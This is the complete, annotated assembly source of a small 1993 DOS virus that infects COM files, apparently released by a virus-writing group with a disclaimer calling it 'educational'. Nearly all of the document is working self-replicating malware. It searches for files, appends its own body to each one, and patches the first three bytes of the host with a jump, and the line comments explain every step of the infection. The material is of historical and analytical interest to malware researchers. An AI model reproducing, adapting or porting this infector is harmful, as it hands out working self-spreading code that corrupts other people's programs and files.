Assembly Source File  |  1993-03-28  |  5KB  |  117 lines

  1. ;               The Eem-DOS 5-Voorde Virus version 2.0
  2. ;
  3. ; Smallest (101 bytes) COM file infector, which works on the following
  4. ; principle:
  5. ;
  6. ; Before:
  7. ;    _____________________  ____________
  8. ;   [first 3 bytes of file][rest of file]
  9. ;
  10. ; After:
  11. ;    ____________  ____________  _____  _____________________
  12. ;   [jmp to virus][rest of file][virus][first 3 bytes of file]
  13. ;
  14. ; This way the virus can restore the first 3 bytes of the file so
  15. ; the file will still work.
  16. ;
  17. ; If you want no registers to change you can add some pushes, but
  18. ; it'll make the virus much larger.....
  19. ;
  20. ;       (C)1993 by [DαRkRαY] / TridenT
  21. ;
  22. ; BTW This is only an educational source, and this virus should not be
  23. ; spread; you may publish this file in its original form.
  24. ; If you intend to spread this virus you will take all the responsibilities
  25. ; on yourself so the author will not get into trouble.
  26. ; If you do not agree with this, destroy this file now.
  27. ;
  28. _CODE   SEGMENT                                 ; Single-segment DOS .COM image.
  29.         ASSUME  CS:_CODE
  30.                                                 ; .COM code is assembled for load offset 100h.
  31.         ORG     100h
  32.  
  33.         LEN     EQU THE_END - VX                ; Bytes appended to a target file (VX..THE_END).
  34.  
  35. START:
  36.         DB      0E9h,0,0                        ; Stub host: near JMP (E9h) with displacement 0, so
  37.                                                 ; it lands on VX just as in an infected file.
  38. VX:
  39.         PUSH    SI                              ; Assumes SI = 100h at entry (never set in this file):
  40.         PUSH    SI                              ; one copy stays on the stack as the address the last
  41.         POP     DI                              ; RET returns to; the other becomes DI = 100h.
  42.  
  43.         CALL    RELATIVE                        ; CALL/POP yields the run-time address of RELATIVE, so
  44. RELATIVE:                                       ; the code works at whatever offset it was appended.
  45.         POP     SI                              ;
  46.         ADD     SI,(OLD_BYTES - RELATIVE)       ; SI -> OLD_BYTES (the host's saved first 3 bytes).
  47.  
  48.         PUSH    SI                              ; Keep the OLD_BYTES pointer for later.
  49.  
  50.         MOV     CL,3                            ; Copy 3 bytes OLD_BYTES -> 100h, repairing the host in
  51.         REP     MOVSB                           ; memory. Only CL is set: assumes CH = 0 -- TODO confirm.
  52.  
  53.         MOV     DX,SI                           ; SI is now 3 past OLD_BYTES, i.e. at FILE_NAME ('*.*').
  54.  
  55.         POP     SI                              ; SI -> OLD_BYTES again.
  56.  
  57.         DEC     AX                              ; Assumes AX = 0 at entry, giving AH = FFh; FFh + 4Fh
  58. AGAIN:  ADD     AH,4Fh                          ; wraps to 4Eh (find first). On re-entry from the JE
  59.         INT     21h                             ; below AH is presumably 0 after the read, giving 4Fh
  60.         JC      EXIT                            ; (find next). Carry set = no match: run the host.
  61.  
  62.         MOV     DI,SI                           ; DI -> OLD_BYTES, reused as the 3-byte read buffer.
  63.  
  64.         MOV     AH,3Eh                          ; OPEN first issues this close on handle BX, then opens
  65.         CALL    OPEN                            ; the found file. BX is not set before the first call.
  66.                                                 ; (Author calls the close an anti-debug trick; unverified.)
  67.         MOV     AH,3Fh                          ; Read the target's first 3 bytes into OLD_BYTES.
  68.         CALL    IO                              ;
  69.  
  70.         CMP     BYTE PTR [DI],0E9h              ; Infection marker: a file whose first byte is E9h (a
  71.         JE      AGAIN                           ; near JMP, not a far JMP) is skipped as already done.
  72.  
  73.         MOV     AX,4202h                        ; LSEEK relative to end of file, offset CX:DX = 0:0
  74.         XOR     CX,CX                           ; (CWD clears DX because AX is positive).
  75.         CWD                                     ; DOS returns the size in DX:AX; only AX is used below.
  76.         INT     21h                             ;
  77.  
  78.         SUB     AX,3                            ; Displacement for a 3-byte JMP at offset 0 to reach EOF.
  79.         ADD     DI,8                            ; DI = OLD_BYTES + 8 = THE_END, the word after NEW_BYTES.
  80.         MOV     WORD PTR DS:[DI],AX             ; Completes the E9h + disp16 sequence in memory.
  81.  
  82.         MOV     AH,40h                          ; Append LEN bytes starting at VX to the end of the file;
  83.         MOV     CL,LEN                          ; OLD_BYTES now holds the target's own first 3 bytes.
  84.         MOV     DX,DI                           ; DX = THE_END - ((OLD_BYTES - VX) + 8) = VX.
  85.         SUB     DX,(OLD_BYTES - VX) + 8         ; OPEN then opens the file again, which presumably puts
  86.         CALL    OPEN                            ; the new handle at offset 0. No result is checked.
  87.  
  88.         DEC     DI                              ; DI -> NEW_BYTES (E9h followed by the displacement).
  89.         MOV     AH,40h                          ; Write function; execution falls through into IO.
  90. IO:                                             ; Shared tail: caller sets AH = 3Fh (read) or 40h (write).
  91.         MOV     CL,3                            ; 3 bytes (relies on CH = 0),
  92.         MOV     DX,DI                           ; buffer at DI, handle in BX.
  93.         INT     21h                             ;
  94. EXIT:
  95.         RET                                     ; Returns to IO's caller, or pops the saved 100h and
  96.                                                 ; starts the repaired host program.
  97. OPEN:                                           ; Runs the request already in AH, then opens the file.
  98.         INT     21h                             ; Caller's function (3Eh close or 40h write).
  99.         MOV     AX,3D02h                        ; Open with read/write access.
  100.         MOV     DX,9Eh                          ; 9Eh = 80h + 1Eh: file-name field of the find result,
  101.         INT     21h                             ; assuming the DTA is still at its default PSP:80h.
  102.         XCHG    BX,AX                           ; BX = handle; an open failure is not checked.
  103.         RET
  104.                                                 ; Layout below is fixed: THE_END - OLD_BYTES = 3+4+1 = 8.
  105. OLD_BYTES:      NOP                             ; 3-byte save area. In this first-generation stub it
  106.                 NOP                             ; holds NOP/NOP/RET; in an infected file it holds the
  107.                 RET                             ; host's original first 3 bytes (8 bytes before EOF).
  108.  
  109. FILE_NAME:      DB      '*.*',0h                ; Search mask: matches every file name, not only
  110.                                                 ; .COM files.
  111. NEW_BYTES       DB      0E9h                    ; JMP opcode; its disp16 is stored at THE_END at run time.
  112.  
  113. THE_END:
  114.  
  115. _CODE   ENDS
  116.         END     START
  117.